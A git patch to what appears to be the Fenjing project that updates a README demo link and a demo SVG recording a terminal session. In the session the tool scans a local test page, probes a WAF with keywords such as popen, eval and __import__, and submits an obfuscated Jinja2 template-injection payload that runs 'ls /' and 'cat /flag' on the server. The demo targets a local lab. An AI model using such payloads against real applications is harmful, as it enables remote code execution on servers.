From d755fc842df8bce2d7a5f4bdd2f5a344db651d51 Mon Sep 17 00:00:00 2001 From: Marven11 <110723864+Marven11@users.noreply.github.com> Date: Tue, 26 Dec 2023 12:46:48 +0800 Subject: [PATCH] Update README --- README.md | 2 +- assets/demo.svg | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/README.md b/README.md index 2f9692a..9b1de4a 100755 --- a/README.md +++ b/README.md @@ -14,7 +14,7 @@ ## 演示 -[![asciicast](assets/demo.svg)](https://asciinema.org/a/TCtEXFymWedBthfQPs3rnocL9) +[![asciicast](assets/demo.svg)](https://asciinema.org/a/rewsTVvAPqH59GWNtn7QmZ6RU) ## 主要特性 diff --git a/assets/demo.svg b/assets/demo.svg index 25634d1..d783078 100644 --- a/assets/demo.svg +++ b/assets/demo.svg @@ -1 +1 @@ -Fenjinggit:(dev)Fenjinggit:(dev)pythonFenjinggit:(dev)python-mFenjinggit:(dev)python-mfenjingFenjinggit:(dev)python-mfenjingscanFenjinggit:(dev)python-mfenjingscan--urlFenjinggit:(dev)python-mfenjingscan--url'http://127.0.0.1:7888/secr3ttt'ttt'--intervalttt'--interval0.02______/__/______(_|_)________//_/_\/__\///__\/__`//__/__///////////_///_/\___/_//_/_//_/_//_/\__,//___//____/------MadewithpassionbyMarven11WARNING:[scan_url]|StartscanningWARNING:[scan_url]|Bursting3params...WARNING:[scan_url]|Foundgetparamswithburst:{'klf'}WARNING:[cli]|Scanform:{'action':'/secr3ttt','method':'GET','inputs':{'klf'}}INFO:[cracker]|Cracking...INFO:[waf_func_gen]|Testingdangerouskeyword'npdwcdnpdw'INFO:[waf_func_gen]|Testingdangerouskeyword'npdw8npdw'INFO:[waf_func_gen]|Testingdangerouskeyword'npdwsystemnpdw'INFO:[waf_func_gen]|Testingdangerouskeyword'npdwincludenpdw'INFO:[waf_func_gen]|Testingdangerouskeyword'npdwvaluenpdw'INFO:[waf_func_gen]|Testingdangerouskeyword'npdwsubprocessnpdw'INFO:[waf_func_gen]|Testingdangerouskeyword'npdw|npdw'INFO:[waf_func_gen]|Testingdangerouskeyword'npdw\\unpdw'INFO:[waf_func_gen]|Testingdangerouskeyword'npdw+npdw'INFO:[waf_func_gen]|Testingdangerouskeyword'npdwgetitemnpdw'INFO:[waf_func_gen]|Testingdangerouskeyword'npdwposixnpdw'INFO:[waf_func_gen]|Testingdangerouskeyword'npdw0npdw'INFO:[waf_func_gen]|Testingdangerouskeyword'npdw=npdw'INFO:[waf_func_gen]|Testingdangerouskeyword'npdw{{npdw'INFO:[waf_func_gen]|Testingdangerouskeyword'npdwindexnpdw'INFO:[waf_func_gen]|Testingdangerouskeyword'npdw2npdw'INFO:[waf_func_gen]|Testingdangerouskeyword'npdw),)npdw'INFO:[waf_func_gen]|Testingdangerouskeyword'npdwosnpdw'INFO:[waf_func_gen]|Testingdangerouskeyword'npdwpopnpdw'INFO:[waf_func_gen]|Testingdangerouskeyword'npdwappnpdw'INFO:[waf_func_gen]|Testingdangerouskeyword'npdwget_flashed_messagesnpdw'INFO:[waf_func_gen]|Testingdangerouskeyword'npdwrangenpdw'INFO:[waf_func_gen]|Testingdangerouskeyword'npdwglobalnpdw'INFO:[waf_func_gen]|Testingdangerouskeyword'npdwbasenpdw'INFO:[waf_func_gen]|Testingdangerouskeyword'npdwlengthnpdw'INFO:[waf_func_gen]|Testingdangerouskeyword'esqcnotesqc'INFO:[waf_func_gen]|Testingdangerouskeyword'gunqexecgunq'INFO:[waf_func_gen]|Testingdangerouskeyword'gunqforgunq'INFO:[waf_func_gen]|Testingdangerouskeyword'gunq]gunq'INFO:[waf_func_gen]|Testingdangerouskeyword'gunq9gunq'INFO:[waf_func_gen]|Testingdangerouskeyword'gunqflashedgunq'INFO:[waf_func_gen]|Testingdangerouskeyword'gunqflaggunq'INFO:[waf_func_gen]|Testingdangerouskeyword'gunq6gunq'INFO:[waf_func_gen]|Testingdangerouskeyword'gunqclassgunq'INFO:[waf_func_gen]|Testingdangerouskeyword'gunq1gunq'INFO:[waf_func_gen]|Testingdangerouskeyword'gunq))gunq'INFO:[waf_func_gen]|Testingdangerouskeyword'gunqlipsumgunq'INFO:[waf_func_gen]|Testingdangerouskeyword'gunq5gunq'INFO:[waf_func_gen]|Testingdangerouskeyword'gunqrequestgunq'INFO:[waf_func_gen]|Testingdangerouskeyword'gunqurl_forgunq'INFO:[waf_func_gen]|Testingdangerouskeyword'gunq_gunq'INFO:[waf_func_gen]|Testingdangerouskeyword'gunqselfgunq'INFO:[waf_func_gen]|Testingdangerouskeyword'gunqattrgunq'INFO:[waf_func_gen]|Testingdangerouskeyword'gunq4gunq'INFO:[waf_func_gen]|Testingdangerouskeyword"gunq'gunq"INFO:[waf_func_gen]|Testingdangerouskeyword'aldbglobalsaldb'INFO:[waf_func_gen]|Testingdangerouskeyword'aldbcataldb'INFO:[waf_func_gen]|Testingdangerouskeyword'aldb.aldb'INFO:[waf_func_gen]|Testingdangerouskeyword'aldbconfigaldb'INFO:[waf_func_gen]|Testingdangerouskeyword'aldbordaldb'INFO:[waf_func_gen]|Testingdangerouskeyword'aldb37aldb'INFO:[waf_func_gen]|Testingdangerouskeyword'aldb}}aldb'INFO:[waf_func_gen]|Testingdangerouskeyword'aldb7aldb'INFO:[waf_func_gen]|Testingdangerouskeyword'aldbopenaldb'INFO:[waf_func_gen]|Testingdangerouskeyword'aldbifaldb'INFO:[waf_func_gen]|Testingdangerouskeyword'aldbsubclassesaldb'INFO:[waf_func_gen]|Testingdangerouskeyword'aldb[aldb'INFO:[waf_func_gen]|Testingdangerouskeyword'aldburlaldb'INFO:[waf_func_gen]|Testingdangerouskeyword'aldbinitaldb'INFO:[waf_func_gen]|Testingdangerouskeyword'oeqxargoeqx'INFO:[waf_func_gen]|Testingdangerouskeyword'oeqxdictoeqx'INFO:[waf_func_gen]|Testingdangerouskeyword'oeqx\\oeqx'INFO:[waf_func_gen]|Testingdangerouskeyword'oeqx~oeqx'INFO:[waf_func_gen]|Testingdangerouskeyword'jfre\\xjfre'INFO:[waf_func_gen]|Testingdangerouskeyword'jfreimportjfre'INFO:[waf_func_gen]|Testingdangerouskeyword'jfrereadjfre'INFO:[waf_func_gen]|Testingdangerouskeyword'jfrecountjfre'INFO:[waf_func_gen]|Testingdangerouskeyword'jfre0"jfre'INFO:[waf_func_gen]|Testingdangerouskeyword'jfre"jfre'INFO:[waf_func_gen]|Testingdangerouskeyword'eloonamespaceeloo'INFO:[waf_func_gen]|Testingdangerouskeyword'eloo%eloo'INFO:[waf_func_gen]|Testingdangerouskeyword'eloo3eloo'INFO:[waf_func_gen]|Testingdangerouskeyword'eloopopeneloo'INFO:[waf_func_gen]|Testingdangerouskeyword'vullenvvull'INFO:[waf_func_gen]|Testingdangerouskeyword'dxlkevaldxlk'INFO:[waf_func_gen]|Testingdangerouskeyword'dxlkmrodxlk'INFO:[waf_func_gen]|Testingdangerouskeyword'dxlkbuiltinsdxlk'INFO:[waf_func_gen]|Testingdangerouskeyword'dxlkchrdxlk'INFO:[waf_func_gen]|Testingdangerouskeyword'cd8cd8'INFO:[waf_func_gen]|Testingdangerouskeyword'systemincludesysteminclude'INFO:[waf_func_gen]|Testingdangerouskeyword'valuesubprocessvaluesubprocess'INFO:[waf_func_gen]|Testingdangerouskeyword'|\\u|\\u'INFO:[waf_func_gen]|Testingdangerouskeyword'+getitem+getitem'INFO:[waf_func_gen]|Testingdangerouskeyword'posix0posix0'INFO:[waf_func_gen]|Testingdangerouskeyword'={{={{'INFO:[waf_func_gen]|Testingdangerouskeyword'index2index2'INFO:[waf_func_gen]|Testingdangerouskeyword'),)os),)os'INFO:[waf_func_gen]|Testingdangerouskeyword'popapppopapp'INFO:[waf_func_gen]|Testingdangerouskeyword'get_flashed_messagesrangeget_flashed_messagesrange'INFO:[waf_func_gen]|Testingdangerouskeyword'globalbaseglobalbase'INFO:[waf_func_gen]|Testingdangerouskeyword'lengthnotlengthnot'INFO:[waf_func_gen]|Testingdangerouskeyword'execforexecfor'INFO:[waf_func_gen]|Testingdangerouskeyword']9]9'INFO:[waf_func_gen]|Testingdangerouskeyword'flashedflagflashedflag'INFO:[waf_func_gen]|Testingdangerouskeyword'6class6class'INFO:[waf_func_gen]|Testingdangerouskeyword'1))1))'INFO:[waf_func_gen]|Testingdangerouskeyword'lipsum5lipsum5'INFO:[waf_func_gen]|Testingdangerouskeyword'requesturl_forrequesturl_for'INFO:[waf_func_gen]|Testingdangerouskeyword'_self_self'INFO:[waf_func_gen]|Testingdangerouskeyword'attr4attr4'INFO:[waf_func_gen]|Testingdangerouskeyword"'globals'globals"INFO:[waf_func_gen]|Testingdangerouskeyword'cat.cat.'INFO:[waf_func_gen]|Testingdangerouskeyword'configordconfigord'INFO:[waf_func_gen]|Testingdangerouskeyword'37}}37}}'INFO:[waf_func_gen]|Testingdangerouskeyword'7open7open'INFO:[waf_func_gen]|Testingdangerouskeyword'ifsubclassesifsubclasses'INFO:[waf_func_gen]|Testingdangerouskeyword'[url[url'INFO:[waf_func_gen]|Testingdangerouskeyword'initarginitarg'INFO:[waf_func_gen]|Testingdangerouskeyword'dict\\dict\\'INFO:[waf_func_gen]|Testingdangerouskeyword'~\\x~\\x'INFO:[waf_func_gen]|Testingdangerouskeyword'importreadimportread'INFO:[waf_func_gen]|Testingdangerouskeyword'count0"count0"'INFO:[waf_func_gen]|Testingdangerouskeyword'"namespace"namespace'INFO:[waf_func_gen]|Testingdangerouskeyword'%3%3'INFO:[waf_func_gen]|Testingdangerouskeyword'popenenvpopenenv'INFO:[waf_func_gen]|Testingdangerouskeyword'evalmroevalmro'INFO:[waf_func_gen]|Testingdangerouskeyword'builtinschrbuiltinschr'INFO:[waf_func_gen]|Testingdangerouskeyword'cdcd'INFO:[waf_func_gen]|Testingdangerouskeyword'88'INFO:[waf_func_gen]|Testingdangerouskeyword'systemsystem'INFO:[waf_func_gen]|Testingdangerouskeyword'includeinclude'INFO:[waf_func_gen]|Testingdangerouskeyword'valuevalue'INFO:[waf_func_gen]|Testingdangerouskeyword'subprocesssubprocess'INFO:[waf_func_gen]|Testingdangerouskeyword'||'INFO:[waf_func_gen]|Testingdangerouskeyword'\\u\\u'INFO:[waf_func_gen]|Testingdangerouskeyword'++'INFO:[waf_func_gen]|Testingdangerouskeyword'getitemgetitem'INFO:[waf_func_gen]|Testingdangerouskeyword'posixposix'INFO:[waf_func_gen]|Testingdangerouskeyword'00'INFO:[waf_func_gen]|Testingdangerouskeyword'=='INFO:[waf_func_gen]|Testingdangerouskeyword'{{{{'INFO:[waf_func_gen]|Testingdangerouskeyword'indexindex'INFO:[waf_func_gen]|Testingdangerouskeyword'22'INFO:[waf_func_gen]|Testingdangerouskeyword'),)),)'INFO:[waf_func_gen]|Testingdangerouskeyword'osos'INFO:[waf_func_gen]|Testingdangerouskeyword'poppop'INFO:[waf_func_gen]|Testingdangerouskeyword'appapp'INFO:[waf_func_gen]|Testingdangerouskeyword'get_flashed_messagesget_flashed_messages'INFO:[waf_func_gen]|Testingdangerouskeyword'rangerange'INFO:[waf_func_gen]|Testingdangerouskeyword'globalglobal'INFO:[waf_func_gen]|Testingdangerouskeyword'basebase'INFO:[waf_func_gen]|Testingdangerouskeyword'lengthlength'INFO:[waf_func_gen]|Testingdangerouskeyword'notnot'INFO:[waf_func_gen]|Testingdangerouskeyword'execexec'INFO:[waf_func_gen]|Testingdangerouskeyword'forfor'INFO:[waf_func_gen]|Testingdangerouskeyword']]'INFO:[waf_func_gen]|Testingdangerouskeyword'99'INFO:[waf_func_gen]|Testingdangerouskeyword'flashedflashed'INFO:[waf_func_gen]|Testingdangerouskeyword'flagflag'INFO:[waf_func_gen]|Testingdangerouskeyword'66'INFO:[waf_func_gen]|Testingdangerouskeyword'classclass'INFO:[waf_func_gen]|Testingdangerouskeyword'11'INFO:[waf_func_gen]|Testingdangerouskeyword'))))'INFO:[waf_func_gen]|Testingdangerouskeyword'lipsumlipsum'INFO:[waf_func_gen]|Testingdangerouskeyword'55'INFO:[waf_func_gen]|Testingdangerouskeyword'requestrequest'INFO:[waf_func_gen]|Testingdangerouskeyword'url_forurl_for'INFO:[waf_func_gen]|Testingdangerouskeyword'__'INFO:[waf_func_gen]|Testingdangerouskeyword'selfself'INFO:[waf_func_gen]|Testingdangerouskeyword'attrattr'INFO:[waf_func_gen]|Testingdangerouskeyword'44'INFO:[waf_func_gen]|Testingdangerouskeyword"''"INFO:[waf_func_gen]|Testingdangerouskeyword'globalsglobals'INFO:[waf_func_gen]|Testingdangerouskeyword'catcat'INFO:[waf_func_gen]|Testingdangerouskeyword'..'INFO:[waf_func_gen]|Testingdangerouskeyword'configconfig'INFO:[waf_func_gen]|Testingdangerouskeyword'ordord'INFO:[waf_func_gen]|Testingdangerouskeyword'3737'INFO:[waf_func_gen]|Testingdangerouskeyword'}}}}'INFO:[waf_func_gen]|Testingdangerouskeyword'77'INFO:[waf_func_gen]|Testingdangerouskeyword'openopen'INFO:[waf_func_gen]|Testingdangerouskeyword'ifif'INFO:[waf_func_gen]|Testingdangerouskeyword'subclassessubclasses'INFO:[waf_func_gen]|Testingdangerouskeyword'[['INFO:[waf_func_gen]|Testingdangerouskeyword'urlurl'INFO:[waf_func_gen]|Testingdangerouskeyword'initinit'INFO:[waf_func_gen]|Testingdangerouskeyword'argarg'INFO:[waf_func_gen]|Testingdangerouskeyword'dictdict'INFO:[waf_func_gen]|Testingdangerouskeyword'\\\\'INFO:[waf_func_gen]|Testingdangerouskeyword'~~'INFO:[waf_func_gen]|Testingdangerouskeyword'\\x\\x'INFO:[waf_func_gen]|Testingdangerouskeyword'importimport'INFO:[waf_func_gen]|Testingdangerouskeyword'readread'INFO:[waf_func_gen]|Testingdangerouskeyword'countcount'INFO:[waf_func_gen]|Testingdangerouskeyword'0"0"'INFO:[waf_func_gen]|Testingdangerouskeyword'""'INFO:[waf_func_gen]|Testingdangerouskeyword'namespacenamespace'INFO:[waf_func_gen]|Testingdangerouskeyword'%%'INFO:[waf_func_gen]|Testingdangerouskeyword'33'INFO:[waf_func_gen]|Testingdangerouskeyword'popenpopen'INFO:[waf_func_gen]|Testingdangerouskeyword'envenv'INFO:[waf_func_gen]|Testingdangerouskeyword'evaleval'INFO:[waf_func_gen]|Testingdangerouskeyword'mromro'INFO:[waf_func_gen]|Testingdangerouskeyword'builtinsbuiltins'INFO:[waf_func_gen]|Testingdangerouskeyword'chrchr'INFO:[waf_func_gen]|Testinglongpayloads...INFO:[full_payload_gen]|use{{PAYLOAD}}INFO:[full_payload_gen]|Addingsomestringvariables...INFO:[payload_gen]|failedgeneratingvariable_of('__mul__'),itmightnotbeanissue.INFO:[payload_gen]|failedgeneratingstring_concatmany([('multiply',('string_underline',),('integer',2)),('string','class'),('multiply',('string_underline',),('integer',2))]),itmightnotbeanissue.INFO:[payload_gen]|failedgeneratingvariable_of('__add__'),itmightnotbeaINFO:[payload_gen]|Great,string('class')canbedict(cla=x,ss=x)|joinINFO:[payload_gen]|Great,string('__class__')canbe(ndll,ndll,dict(cla=x,ss=x)|join,ndll,ndll)|joinINFO:[full_payload_gen]|Adding'__class__'with{%setrpkr=(ndll,ndll,dict(cla=x,ss=x)|join,ndll,ndll)|join%}underline',),('integer',2)),('string','globals'),('multiply',('string_underline',),('integer',2))]),itmightnotbeanissue.INFO:[payload_gen]|Great,string('globals')canbedict(glo=x,bal=x,s=x)|joinINFO:[payload_gen]|Great,string('__globals__')canbe(ndll,ndll,dict(glo=x,bal=x,s=x)|join,ndll,ndll)|joinINFO:[full_payload_gen]|Adding'__globals__'with{%setibnh=(ndll,ndll,dict(glo=x,bal=x,s=x)|join,ndll,ndll)|join%}underline',),('integer',2)),('string','init'),('multiply',('string_underline',),('integer',2))]),itmightnotbeanissue.INFO:[payload_gen]|Great,string('init')canbedict(ini=x,t=x)|joinINFO:[payload_gen]|Great,string('__init__')canbe(ndll,ndll,dict(ini=x,t=x)|join,ndll,ndll)|joinINFO:[full_payload_gen]|Adding'__init__'with{%setauwj=(ndll,ndll,dict(ini=x,t=x)|join,ndll,ndll)|join%}underline',),('integer',2)),('string','dict'),('multiply',('string_underliINFO:[payload_gen]|Great,string('dict')canbedict(dict=x)|joinINFO:[payload_gen]|Great,string('__dict__')canbe(ndll,ndll,dict(dict=x)|join,ndll,ndll)|joinINFO:[full_payload_gen]|Adding'__dict__'with{%setsblf=(ndll,ndll,dict(dict=x)|join,ndll,ndll)|join%}underline',),('integer',2)),('string','builtins'),('multiply',('string_underline',),('integer',2))]),itmightnotbeanissue.INFO:[payload_gen]|Great,string('builtins')canbedict(bui=x,lti=x,ns=x)|joinINFO:[payload_gen]|Great,string('__builtins__')canbe(ndll,ndll,dict(bui=x,lti=x,ns=x)|join,ndll,ndll)|joinINFO:[full_payload_gen]|Adding'__builtins__'with{%setppyf=(ndll,ndll,dict(bui=x,lti=x,ns=x)|join,ndll,ndll)|join%}underline',),('integer',2)),('string','getitem'),('multiply',('string_undeINFO:[payload_gen]|Great,string('getitem')canbedict(get=x,ite=x,m=x)|joinINFO:[payload_gen]|Great,string('__getitem__')canbe(ndll,ndll,dict(get=x,ite=x,m=x)|join,ndll,ndll)|joinINFO:[full_payload_gen]|Adding'__getitem__'with{%setpfum=(ndll,ndll,dict(get=x,ite=x,m=x)|join,ndll,ndll)|join%}underline',),('integer',2)),('string','import'),('multiply',('string_underline',),('integer',2))]),itmightnotbeanissue.INFO:[payload_gen]|Great,string('import')canbedict(imp=x,ort=x)|joinINFO:[payload_gen]|Great,string('__import__')canbe(ndll,ndll,dict(imp=x,ort=x)|join,ndll,ndll)|joinINFO:[full_payload_gen]|Adding'__import__'with{%setecoc=(ndll,ndll,dict(imp=x,ort=x)|join,ndll,ndll)|join%}INFO:[full_payload_gen]|Adding'__getitem__'with{%setttfo=(ndll,ndll,dict(gunderline',),('integer',2)),('string','add'),('multiply',('string_underline',),('integer',2))]),itmightnotbeanissue.INFO:[payload_gen]|Great,string('add')canbedict(add=x)|joinINFO:[payload_gen]|Great,string('__add__')canbe(ndll,ndll,dict(add=x)|join,ndll,ndll)|joinINFO:[full_payload_gen]|Adding'__add__'with{%setiyym=(ndll,ndll,dict(add=x)|join,ndll,ndll)|join%}underline',),('integer',2)),('string','mul'),('multiply',('string_underlinINFO:[payload_gen]|Great,string('mul')canbedict(mul=x)|joinINFO:[payload_gen]|Great,string('__mul__')canbe(ndll,ndll,dict(mul=x)|joinINFO:[full_payload_gen]|Adding'__mul__'with{%setwnnr=(ndll,ndll,dict(mul=xunderline',),('integer',2)),('string','mod'),('multiply',('string_underlinINFO:[payload_gen]|Great,string('mod')canbedict(mod=x)|joinINFO:[payload_gen]|Great,string('__mod__')canbe(ndll,ndll,dict(mod=x)|joinINFO:[full_payload_gen]|Adding'__mod__'with{%setolzz=(ndll,ndll,dict(mod=xunderline',),('integer',2)),('string','truediv'),('multiply',('string_undeINFO:[payload_gen]|Great,string('truediv')canbedict(truediv=x)|joinINFO:[payload_gen]|Great,string('__truediv__')canbe(ndll,ndll,dict(truediv=x)|join,ndll,ndll)|joinINFO:[full_payload_gen]|Adding'__truediv__'with{%setmihc=(ndll,ndll,dict(truediv=x)|join,ndll,ndll)|join%}INFO:[payload_gen]|failedgeneratingstring_concatmany([('expression',10,[('literal','dict(os=x)|join')])]),itmightnotbeanissue.INFO:[payload_gen]|Great,string('os')canbedict(o=x,s=x)|joinINFO:[full_payload_gen]|Adding'os'with{%setwjit=dict(o=x,s=x)|join%}literal','dict(pop=x)|join')]),('expression',10,[('literal','dict(en=x)|join')])]),itmightnotbeanissue.INFO:[payload_gen]|Great,integer(101)canbe101INFO:[payload_gen]|Great,integer(110)canbe110INFO:[payload_gen]|Great,string('popen')canbex|center(5)|replace(x|center|first,(prrc,dict(c=x)|join)|join)%(112,111,112,101,110)INFO:[full_payload_gen]|Adding'popen'with{%setqfgz=x|center(5)|replace(x|center|first,(prrc,dict(c=x)|join)|join)%(112,111,112,101,110)%}INFO:[payload_gen]|Great,string('read')canbedict(rea=x,d=x)|joinINFO:[full_payload_gen]|Adding'read'with{%setlyot=dict(rea=x,d=x)|join%}literal','dict(pop=x)|join')])]),itmightnotbeanissue.INFO:[payload_gen]|Great,string('pop')canbex|center(3)|replace(x|center|first,(prrc,dict(c=x)|join)|join)%(112,111,112)INFO:[full_payload_gen]|Adding'pop'with{%setmjbg=x|center(3)|replace(x|center|first,(prrc,dict(c=x)|join)|join)%(112,111,112)%}INFO:[payload_gen]|Great,string('get')canbedict(get=x)|joinINFO:[full_payload_gen]|Adding'get'with{%settedd=dict(get=x)|join%}INFO:[payload_gen]|Great,string('eval')canbedict(eval=x)|joinINFO:[full_payload_gen]|Adding'eval'with{%setcctb=dict(eval=x)|join%}literal','dict(chr=x)|join')])]),itmightnotbeanissue.INFO:[payload_gen]|Great,string('chr')canbedict(c=x,h=x,r=x)|joinINFO:[full_payload_gen]|Adding'chr'with{%setwrya=dict(c=x,h=x,r=x)|join%}INFO:[payload_gen]|Great,string('%c')canbe(prrc,dict(c=x)|join)|joinINFO:[full_payload_gen]|Adding'%c'with{%setslms=(prrc,dict(c=x)|join)|join%}INFO:[full_payload_gen]|Startgeneratingfinalexpression...INFO:[payload_gen]|Great,string('__globals__')canbeibnhINFO:[payload_gen]|Great,string('__builtins__')canbeppyfINFO:[payload_gen]|Great,string('__getitem__')canbepfumINFO:[payload_gen]|Great,string('__import__')canbeecocINFO:[payload_gen]|Great,string('os')canbewjitINFO:[payload_gen]|Great,wegeneratemodule_os()INFO:[payload_gen]|Great,string('popen')canbeqfgzINFO:[payload_gen]|Great,integer(99)canbe99INFO:[payload_gen]|Great,integer(104)canbe104INFO:[payload_gen]|Great,integer(102)canbe102INFO:[payload_gen]|Great,integer(51)canbe51INFO:[payload_gen]|Great,integer(106)canbe106INFO:[payload_gen]|Great,integer(49)canbe49INFO:[payload_gen]|Great,integer(103)canbe103INFO:[payload_gen]|Great,integer(59)canbe59INFO:[payload_gen]|Great,string('echof3nj1ng;')canbeslms|attr(wnnr)(15)%(101,99,104,111,32,102,51,110,32,32,106,49,110,103,59)INFO:[payload_gen]|Great,wegenerateos_popen_obj('echof3nj1ng;')INFO:[payload_gen]|Great,string('read')canbelyotINFO:[payload_gen]|Great,wegenerateos_popen_read('echof3nj1ng;')INFO:[cracker]|Testinggeneratedpayload.INFO:[cracker]|Success!Nowwecangeneratepayloads.Example/示例:$>>ls/$>>@eval1+2+3+100000$>>@get-configType@helpforfullhelp/输入@help获得完整帮助$>>$>>ls$>>ls/INFO:[payload_gen]|Great,integer(108)canbe108INFO:[payload_gen]|Great,integer(47)canbe47INFO:[payload_gen]|Great,string('ls/')canbeslms|attr(wnnr)(4)%(108,115,32,47)INFO:[payload_gen]|Great,wegenerateos_popen_obj('ls/')INFO:[payload_gen]|Great,wegenerateos_popen_read('ls/')INFO:[cli]|Submitpayload{%setwjit=dict(o=x,s=x)|join%}{%setlyot=dict(rea=x,d=x)|join%}{%setndll={}|select()|trim|list|batch(25)|first|last%}{%setibnh=(ndll,ndll,dict(glo=x,bal=x,s=x)|join,ndll,ndll)|join%}{%setpfum=(ndll,ndll,dict(get=x,ite=x,m=x)|join,ndll,ndll)|join%}{%setppyf=(ndll,ndll,dict(bui=x,lti=x,ns=x)|join,ndll,ndll)|join%}{%setecoc=(ndll,ndll,dict(imp=x,ort=x)|join,ndll,ndll)|join%}{%setprrc=((dict(dict(dict(a=1)|tojson|batch(2),)|batch(2),)|join,dict(c=x)|join,dict()|trim|last)|join).format((9,9,9,1,9)|sum)%}{%setqfgz=x|center(5)|replace(x|center|first,(prrc,dict(c=x)|join)|join)%(112,111,112,101,110)%}{%setslms=(prrc,dict(c=x)|join)|join%}{%setwnnr=(ndll,ndll,dict(mul=x)|join,ndll,ndll)|join%}{{lipsum|attr(ibnh)|attr(pfum)(ppyf)|attr(pfum)(ecoc)(wjit)|attr(qfgz)(slms|attr(wnnr)(4)%(108,115,32,47),)|attr(lyot)()}}klf不会连这都绕不过去吧~devetcflaghomehome.origliblib64lost+foundmediamntoptprocrootrunrwsbinsrvsystmpusrvar$>>cat$>>cat/flagINFO:[payload_gen]|Great,string('cat/flag')canbeslms|attr(wnnr)(9)%(99,97,116,32,47,102,108,97,103)INFO:[payload_gen]|Great,wegenerateos_popen_obj('cat/flag')INFO:[payload_gen]|Great,wegenerateos_popen_read('cat/flag'))(slms|attr(wnnr)(9)%(99,97,116,32,47,102,108,97,103),)|attr(lyot)()}}你好!flag{Byp455#W4F#SUCCESS!}win.html$>>Bye!Fenjinggit:(dev)pFenjinggit:(dev)pyFenjinggit:(dev)pytFenjinggit:(dev)pythFenjinggit:(dev)pythoFenjinggit:(dev)python-Fenjinggit:(dev)python-mfFenjinggit:(dev)python-mfeFenjinggit:(dev)python-mfenFenjinggit:(dev)python-mfenjFenjinggit:(dev)python-mfenjiFenjinggit:(dev)python-mfenjinFenjinggit:(dev)python-mfenjingsFenjinggit:(dev)python-mfenjingscFenjinggit:(dev)python-mfenjingscaFenjinggit:(dev)python-mfenjingscan-Fenjinggit:(dev)python-mfenjingscan--Fenjinggit:(dev)python-mfenjingscan--uFenjinggit:(dev)python-mfenjingscan--urFenjinggit:(dev)python-mfenjingscan--url'Fenjinggit:(dev)python-mfenjingscan--url'http://127.0.0.1:7888/secr3tttttt'-ttt'--ttt'--ittt'--inttt'--intttt'--intettt'--interttt'--intervttt'--intervattt'--interval0ttt'--interval0.ttt'--interval0.0$>>l你好!afsbinboot$>>c$>>ca$>>cat/$>>cat/f$>>cat/fl$>>cat/fla \ No newline at end of file +Fenjinggit:(dev)Fenjinggit:(dev)pythonFenjinggit:(dev)python-mFenjinggit:(dev)python-mfenjingFenjinggit:(dev)python-mfenjingscanFenjinggit:(dev)python-mfenjingscan--urlFenjinggit:(dev)python-mfenjingscan--url'http://127.0.0.1:7888/secr3ttt'ttt'--intervalttt'--interval0.02______/__/______(_|_)________//_/_\/__\///__\/__`//__/__///////////_///_/\___/_//_/_//_/_//_/\__,//___//____/------MadewithpassionbyMarven11WARNING:[scan_url]|StartscanningWARNING:[scan_url]|Bursting3params...WARNING:[scan_url]|Foundgetparamswithburst:{'klf'}WARNING:[cli]|Scanform:{'action':'/secr3ttt','method':'GET','inputs':{'klf'}}INFO:[cracker]|Targetispython3INFO:[cracker]|Cracking...INFO:[waf_func_gen]|Testingdangerouskeyword'sbsm37sbsm'INFO:[waf_func_gen]|Testingdangerouskeyword'sbsm8sbsm'INFO:[waf_func_gen]|Testingdangerouskeyword'rhumsubclassesrhum'INFO:[waf_func_gen]|Testingdangerouskeyword'rhumforrhum'INFO:[waf_func_gen]|Testingdangerouskeyword'rhumargrhum'INFO:[waf_func_gen]|Testingdangerouskeyword'rhumindexrhum'INFO:[waf_func_gen]|Testingdangerouskeyword'rhum\\urhum'INFO:[waf_func_gen]|Testingdangerouskeyword'rhum),)rhum'INFO:[waf_func_gen]|Testingdangerouskeyword'eyiisystemeyii'INFO:[waf_func_gen]|Testingdangerouskeyword'eyiisubprocesseyii'INFO:[waf_func_gen]|Testingdangerouskeyword'eyiiattreyii'INFO:[waf_func_gen]|Testingdangerouskeyword'eyiinoteyii'INFO:[waf_func_gen]|Testingdangerouskeyword'eyiirangeeyii'INFO:[waf_func_gen]|Testingdangerouskeyword'eyii2eyii'INFO:[waf_func_gen]|Testingdangerouskeyword'eyii0"eyii'INFO:[waf_func_gen]|Testingdangerouskeyword'eyiilengtheyii'INFO:[waf_func_gen]|Testingdangerouskeyword'eyiinamespaceeyii'INFO:[waf_func_gen]|Testingdangerouskeyword'eyii7eyii'INFO:[waf_func_gen]|Testingdangerouskeyword'eyii]eyii'INFO:[waf_func_gen]|Testingdangerouskeyword'eyii\\xeyii'INFO:[waf_func_gen]|Testingdangerouskeyword'eyiichreyii'INFO:[waf_func_gen]|Testingdangerouskeyword'eyiiflashedeyii'INFO:[waf_func_gen]|Testingdangerouskeyword'eyii\\eyii'INFO:[waf_func_gen]|Testingdangerouskeyword'eyiiconfigeyii'INFO:[waf_func_gen]|Testingdangerouskeyword'eyii"eyii'INFO:[waf_func_gen]|Testingdangerouskeyword'eyiiifeyii'INFO:[waf_func_gen]|Testingdangerouskeyword'eyiiglobaleyii'INFO:[waf_func_gen]|Testingdangerouskeyword'eyiiopeneyii'INFO:[waf_func_gen]|Testingdangerouskeyword'eyiiurl_foreyii'INFO:[waf_func_gen]|Testingdangerouskeyword'eyiiclasseyii'INFO:[waf_func_gen]|Testingdangerouskeyword'eyii}}eyii'INFO:[waf_func_gen]|Testingdangerouskeyword'eyiibuiltinseyii'INFO:[waf_func_gen]|Testingdangerouskeyword'eyii{{eyii'INFO:[waf_func_gen]|Testingdangerouskeyword'eyii0eyii'INFO:[waf_func_gen]|Testingdangerouskeyword'eyii1eyii'INFO:[waf_func_gen]|Testingdangerouskeyword'eyii5eyii'INFO:[waf_func_gen]|Testingdangerouskeyword'eyiiimporteyii'INFO:[waf_func_gen]|Testingdangerouskeyword'eyiiurleyii'INFO:[waf_func_gen]|Testingdangerouskeyword'eyiiselfeyii'INFO:[waf_func_gen]|Testingdangerouskeyword'eyiiappeyii'INFO:[waf_func_gen]|Testingdangerouskeyword'eyiirequesteyii'INFO:[waf_func_gen]|Testingdangerouskeyword'eyiicateyii'INFO:[waf_func_gen]|Testingdangerouskeyword'eyiiiniteyii'INFO:[waf_func_gen]|Testingdangerouskeyword'eyii4eyii'INFO:[waf_func_gen]|Testingdangerouskeyword'eyii.eyii'INFO:[waf_func_gen]|Testingdangerouskeyword'eyiiordeyii'INFO:[waf_func_gen]|Testingdangerouskeyword'eyii3eyii'INFO:[waf_func_gen]|Testingdangerouskeyword'eyii+eyii'INFO:[waf_f